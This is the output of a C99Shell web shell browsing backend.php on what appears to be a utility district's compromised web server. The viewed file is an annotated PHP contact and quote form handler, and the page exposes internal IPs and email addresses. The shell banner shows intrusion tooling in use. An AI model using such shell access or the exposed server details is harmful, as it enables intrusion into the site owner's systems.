!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/app/   drwxr-xr-x
Free 130.07 GB of 142.11 GB (91.52%)


Viewing file:     backend.php (8.77 KB)      -rw-r--r--
<?php 
include('../admin/app/core.php');

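// Site configuration for the form backend.
// The listing had lost every "=" and ";" on these lines; they are restored here
// so the block is valid PHP again. The values are unchanged.

// IP addresses used by get_client_ip() to decide whether the
// X-Forwarded-For header may be believed.
$proxy_int_ip = "10.10.0.254";
$proxy_ext_ip = "66.76.188.188";
$server_ip = "10.10.0.4";

$target_email = "website@trisud.com"; // website group
$noreply = "noreply@trisud.com"; // no reply address
$company = "Tri Special Utility District"; // business name

// debug logging
$logForm = "message"; // log name passed to logThis() by the form handlers
$base_log_path = "/var/www/app/logs/"; // <== Note path must be correct!
// NOTE(review): this directory sits under /var/www/app/ — confirm the web
// server does not serve it, since the logs hold submitted names, e-mail
// addresses, phone numbers and client IPs.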




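// actual program like stuff!
$remoteip = get_client_ip();

// Request variables that select which ajax handler below runs.
// Each one is read through isset() so an absent parameter becomes null
// instead of raising an undefined-index notice.
// $_REQUEST is kept because the listing does not show whether the client
// uses GET or POST for these calls.
$send = isset($_REQUEST["send"]) ? $_REQUEST["send"] : null;
$footer = isset($_REQUEST['footer']) ? $_REQUEST['footer'] : null;
$nav = isset($_REQUEST['nav']) ? $_REQUEST['nav'] : null;
$modal = isset($_REQUEST['modal']) ? $_REQUEST['modal'] : null;
$status = isset($_REQUEST['status']) ? $_REQUEST['status'] : null;

// Status request: print the 'light' entry of whatever status_read() returns.
// status_read() is not defined in this file; presumably it comes from the
// included core file — confirm.
if ($status) {
    $st = status_read();
    echo $st['light'];
}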


//FORMS

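// ajax to send a contact msg from MAIN contact form
//
// Validates name / phone / email / message, mails them to $target_email as an
// HTML message and records the same text through logThis(). Prints one status
// string for the ajax caller; validation failures print a message and exit.
if ($send === "contact") {
    // A missing or non-string (array) parameter becomes "" and is then
    // rejected by the completeness check below.
    $name = (isset($_REQUEST["name"]) && is_string($_REQUEST["name"])) ? $_REQUEST["name"] : "";
    $phone = (isset($_REQUEST["phone"]) && is_string($_REQUEST["phone"])) ? $_REQUEST["phone"] : "";
    $email = (isset($_REQUEST["email"]) && is_string($_REQUEST["email"])) ? $_REQUEST["email"] : "";
    $msg = (isset($_REQUEST["message"]) && is_string($_REQUEST["message"])) ? $_REQUEST["message"] : "";

    if (empty($name) || empty($phone) || empty($email) || empty($msg)) {
        echo "Unable to send email, form is not completed!<br>";
        exit();
    }
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
        echo "Please provide a valid email address!<br>";
        exit();
    }
    if (strlen($phone) < 10) {
        echo "Please provide a valid phone number (10 numbers)!<br>";
        exit();
    }

    // The submitted name is placed inside a quoted display name in Reply-To.
    // Control characters (including CR/LF), double quotes and backslashes are
    // removed so the value can neither end the quoted string nor begin a new
    // header line.
    $header_name = preg_replace('/[\x00-\x1F\x7F"\\\\]/', '', $name);

    // The message is sent as text/html, so every submitted value is escaped
    // before it is placed in the body. ISO-8859-1 matches the charset declared
    // in the Content-type header below.
    $html_name = htmlspecialchars($name, ENT_QUOTES, 'ISO-8859-1');
    $html_email = htmlspecialchars($email, ENT_QUOTES, 'ISO-8859-1');
    $html_phone = htmlspecialchars($phone, ENT_QUOTES, 'ISO-8859-1');
    $html_msg = htmlspecialchars($msg, ENT_QUOTES, 'ISO-8859-1');

    $to = $target_email; // website group
    $subjectline = 'Message from website contact form';
    $body = "From: " . $html_name . "<br> E-Mail: " . $html_email . "<br> Phone: " . $html_phone
        . "<br> Message: " . $html_msg . "<br> Sent by IP Address: " . $remoteip;

    // $email has passed FILTER_VALIDATE_EMAIL at this point.
    $headers = array(
        'From: "' . $company . ' Website Main Contact Form" <' . $noreply . '>',
        'Reply-To: "' . $header_name . '" <' . $email . '>',
        'X-Mailer: PHP/' . phpversion(),
        'MIME-Version: 1.0',
        'Content-type: text/html; charset=iso-8859-1',
    );
    $headers = implode("\r\n", $headers);

    $send_test1 = mail($to, $subjectline, $body, $headers);

    // NOTE(review): the message field may contain line breaks, so a single
    // submission can span several lines of the log file.
    logThis($logForm, "contact-backend.php", "\r\n" . str_replace("<br>", "\r\n", $body) . "\r\n", false);

    if ($send_test1) {
        $check = "Your contact message was successfully sent!";
    } else {
        $check = "Something went horribly wrong! Please try again...";
    }
    echo $check;
}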

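// ajax to send a contact msg from QUOTE contact form
//
// Validates name / email / phone / jobaddress (incity and message are
// optional), mails the request to $target_email as an HTML message and records
// the same text through logThis(). Prints one status string for the ajax
// caller; validation failures print a message and exit.
if ($send === "quote") {
    // A missing or non-string (array) parameter becomes "".
    $name = (isset($_REQUEST["name"]) && is_string($_REQUEST["name"])) ? $_REQUEST["name"] : "";
    $phone = (isset($_REQUEST["phone"]) && is_string($_REQUEST["phone"])) ? $_REQUEST["phone"] : "";
    $email = (isset($_REQUEST["email"]) && is_string($_REQUEST["email"])) ? $_REQUEST["email"] : "";
    $jobaddress = (isset($_REQUEST["jobaddress"]) && is_string($_REQUEST["jobaddress"])) ? $_REQUEST["jobaddress"] : "";
    $incity = (isset($_REQUEST["incity"]) && is_string($_REQUEST["incity"])) ? $_REQUEST["incity"] : "";
    $msg = (isset($_REQUEST["message"]) && is_string($_REQUEST["message"])) ? $_REQUEST["message"] : "";

    if (empty($name) || empty($email) || empty($phone) || empty($jobaddress)) {
        echo "Unable to send email, form is not completed!<br>";
        exit();
    }
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
        echo "Please provide a valid email address!<br>";
        exit();
    }
    if (strlen($phone) < 10) {
        echo "Please provide a valid phone number!<br>";
        exit();
    }

    // The submitted name is placed inside a quoted display name in Reply-To.
    // Control characters (including CR/LF), double quotes and backslashes are
    // removed so the value can neither end the quoted string nor begin a new
    // header line.
    $header_name = preg_replace('/[\x00-\x1F\x7F"\\\\]/', '', $name);

    // The message is sent as text/html, so every submitted value is escaped
    // before it is placed in the body. ISO-8859-1 matches the charset declared
    // in the Content-type header below.
    $html_name = htmlspecialchars($name, ENT_QUOTES, 'ISO-8859-1');
    $html_email = htmlspecialchars($email, ENT_QUOTES, 'ISO-8859-1');
    $html_phone = htmlspecialchars($phone, ENT_QUOTES, 'ISO-8859-1');
    $html_jobaddress = htmlspecialchars($jobaddress, ENT_QUOTES, 'ISO-8859-1');
    $html_incity = htmlspecialchars($incity, ENT_QUOTES, 'ISO-8859-1');
    $html_msg = htmlspecialchars($msg, ENT_QUOTES, 'ISO-8859-1');

    $to = $target_email; // website group
    $subjectline = 'Message from website contact form';
    $body = "From: " . $html_name . "<br> E-Mail: " . $html_email . "<br> Phone: " . $html_phone
        . "<br>  Jobsite Address: " . $html_jobaddress . "<br> City Limits: " . $html_incity
        . "<br> Job Details: " . $html_msg . "<br> Sent by IP Address: " . $remoteip;

    // $email has passed FILTER_VALIDATE_EMAIL at this point.
    $headers = array(
        'From: "' . $company . ' Website Main Contact Form" <' . $noreply . '>',
        'Reply-To: "' . $header_name . '" <' . $email . '>',
        'X-Mailer: PHP/' . phpversion(),
        'MIME-Version: 1.0',
        'Content-type: text/html; charset=iso-8859-1',
    );
    $headers = implode("\r\n", $headers);

    $send_test1 = mail($to, $subjectline, $body, $headers);

    // NOTE(review): the free-text fields may contain line breaks, so a single
    // submission can span several lines of the log file.
    logThis($logForm, "quote-backend.php", "\r\n" . str_replace("<br>", "\r\n", $body) . "\r\n", false);

    if ($send_test1) {
        $check = "Your message was successfully sent!";
    } else {
        $check = "Something went horribly wrong! Please try again...";
    }
    echo $check;
}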

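// ajax to send a contact msg from MINI form
//
// Validates name / email / message, mails them to $target_email as an HTML
// message and records the same text through logThis(). Prints one status
// string for the ajax caller; validation failures print a message and exit.
if ($send === "mini") {
    // A missing or non-string (array) parameter becomes "" and is then
    // rejected by the completeness check below.
    $name = (isset($_REQUEST["name"]) && is_string($_REQUEST["name"])) ? $_REQUEST["name"] : "";
    $email = (isset($_REQUEST["email"]) && is_string($_REQUEST["email"])) ? $_REQUEST["email"] : "";
    $msg = (isset($_REQUEST["message"]) && is_string($_REQUEST["message"])) ? $_REQUEST["message"] : "";

    if (empty($name) || empty($email) || empty($msg)) {
        echo "Form is not completed!<br>";
        exit();
    }
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
        echo "Invalid email address!<br>";
        exit();
    }

    // The submitted name is placed inside a quoted display name in Reply-To.
    // Control characters (including CR/LF), double quotes and backslashes are
    // removed so the value can neither end the quoted string nor begin a new
    // header line.
    $header_name = preg_replace('/[\x00-\x1F\x7F"\\\\]/', '', $name);

    // The message is sent as text/html, so every submitted value is escaped
    // before it is placed in the body. ISO-8859-1 matches the charset declared
    // in the Content-type header below.
    $html_name = htmlspecialchars($name, ENT_QUOTES, 'ISO-8859-1');
    $html_email = htmlspecialchars($email, ENT_QUOTES, 'ISO-8859-1');
    $html_msg = htmlspecialchars($msg, ENT_QUOTES, 'ISO-8859-1');

    $to = $target_email; // website group
    $subjectline = 'Message from website mini contact form';
    $body = "From: " . $html_name . "<br> E-Mail: " . $html_email . "<br> Message: " . $html_msg
        . "<br> Sent by IP Address: " . $remoteip;

    // $email has passed FILTER_VALIDATE_EMAIL at this point.
    $headers = array(
        'From: "' . $company . ' Website Mini Contact Form" <' . $noreply . '>',
        'Reply-To: "' . $header_name . '" <' . $email . '>',
        'X-Mailer: PHP/' . phpversion(),
        'MIME-Version: 1.0',
        'Content-type: text/html; charset=iso-8859-1',
    );
    $headers = implode("\r\n", $headers);

    $send_test1 = mail($to, $subjectline, $body, $headers);

    // NOTE(review): the message field may contain line breaks, so a single
    // submission can span several lines of the log file.
    logThis($logForm, "mini-backend.php", "\r\n" . str_replace("<br>", "\r\n", $body) . "\r\n", false);

    if ($send_test1) {
        $check = "Sent email successfully!";
    } else {
        $check = "Please try again...";
    }
    echo $check;
}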

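// Static page fragments requested over ajax. The request value is only used
// as an on/off flag; the file names are fixed literals, so the request cannot
// choose which file is read. Paths are relative to the working directory.
// A failed read (file_get_contents() returning false) prints nothing.

// echo footer
if ($footer) {
    $footer = file_get_contents("footer.ssi");
    if ($footer !== false) {
        echo $footer;
    }
}

// echo navigation
if ($nav) {
    $nav = file_get_contents("nav.ssi");
    if ($nav !== false) {
        echo $nav;
    }
}

// echo modal for privacy policy
if ($modal) {
    $privacy = file_get_contents("../privacy/privacy.ssi");
    if ($privacy !== false) {
        echo $privacy;
    }
}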






//FUNCTIONS

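/**
 * Tries to determine the client's IP address.
 *
 * X-Forwarded-For is consulted only when the direct peer (REMOTE_ADDR) is one
 * of the addresses in $proxy_int_ip, $proxy_ext_ip or $server_ip; any other
 * peer could set the header to an arbitrary value, so it is ignored and
 * REMOTE_ADDR is returned.
 *
 * @return string|null The client IP, or null when REMOTE_ADDR is not set.
 */
function get_client_ip()
{
    global $proxy_int_ip, $proxy_ext_ip, $server_ip;

    // Nothing to do without any reliable information
    if (!isset($_SERVER['REMOTE_ADDR'])) {
        return null;
    }

    // Header that is used by the trusted proxy to refer to the original IP
    $proxy_header = "HTTP_X_FORWARDED_FOR";

    // List of all the proxies that are known to handle 'proxy_header'
    // in known, safe manner
    $trusted_proxies = array($proxy_int_ip, $proxy_ext_ip, $server_ip);

    // Strict comparison: the peer address must match a configured proxy
    // exactly, with no type juggling if one of the globals is unset.
    $peer_is_trusted = in_array($_SERVER['REMOTE_ADDR'], $trusted_proxies, true);

    if ($peer_is_trusted && isset($_SERVER[$proxy_header]) && is_string($_SERVER[$proxy_header])) {
        // Header can contain multiple IP-s of proxies that are passed through.
        // Only the IP added by the last proxy (last IP in the list) can be trusted.
        $proxy_list = explode(",", $_SERVER[$proxy_header]);
        $client_ip = trim(end($proxy_list));

        // Validate just in case
        if (filter_var($client_ip, FILTER_VALIDATE_IP)) {
            return $client_ip;
        }
        // Validation failed: the proxy sent something that is not an IP.
        // TODO: report this; for now fall back to REMOTE_ADDR below.
    }

    // In all other cases, REMOTE_ADDR is the ONLY IP we can trust.
    return $_SERVER['REMOTE_ADDR'];
}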

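/**
 * Appends one entry to the per-day log file of a form.
 *
 * The file name is $base_log_path . $form . "_log_" . <Y-m-d> . ".log".
 * Each entry is "(H:i:s) $var: $value" followed by a line feed.
 *
 * @param string $form     Log name; becomes part of the file name.
 * @param string $var      Label written before the value.
 * @param mixed  $value    Text to log, or any value when $varArray is true.
 * @param bool   $varArray When true, $value is rendered with varDumpToString().
 * @return void
 */
function logThis($form, $var, $value, $varArray = false)
{
    global $base_log_path;

    // $form is concatenated into a file path, so it is reduced to letters,
    // digits, "_" and "-": a caller-supplied name cannot add directory
    // separators or ".." to the path.
    $safe_form = preg_replace('/[^A-Za-z0-9_-]/', '', (string) $form);
    $logFile = $base_log_path . $safe_form . "_log_" . date("Y-m-d") . ".log";

    if ($varArray) {
        $output = "(" . date("H:i:s") . ") " . $var . ": " . varDumpToString($value);
    } else {
        $output = "(" . date("H:i:s") . ") " . $var . ": " . $value;
    }

    // LOCK_EX keeps entries from concurrent requests from interleaving.
    // The result is not checked: logging stays best-effort, as before.
    file_put_contents($logFile, $output . "\n", FILE_APPEND | LOCK_EX);
}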


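/**
 * Returns what var_dump() would print for a value, as a string, so it can be
 * written to a log instead of being sent to the client.
 *
 * @param mixed $var Value to dump.
 * @return string Captured var_dump() output.
 */
function varDumpToString($var)
{
    // Capture var_dump()'s output in a buffer rather than emitting it.
    ob_start();
    var_dump($var);

    // ob_get_clean() returns the buffer contents and discards the buffer.
    return ob_get_clean();
}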


// Sets the default timezone used by the date functions to America/Chicago and
// starts (or resumes) the PHP session.
// NOTE(review): in this listing both calls come after the request handlers and
// after logThis(), which calls date(). If that is the real execution order,
// log timestamps written earlier use whatever timezone was configured before
// this point, and session_start() runs after the handlers have already echoed
// output — confirm whether these lines belong at the top of the file or to the
// included core file.
date_default_timezone_set('America/Chicago');
session_start();

////////////////////////////////////////////
// GENERAL FUNCTIONS
////////////////////////////////////////////

// db_connect function initiates a connection to the mysql database using the Global variables defined above



?>

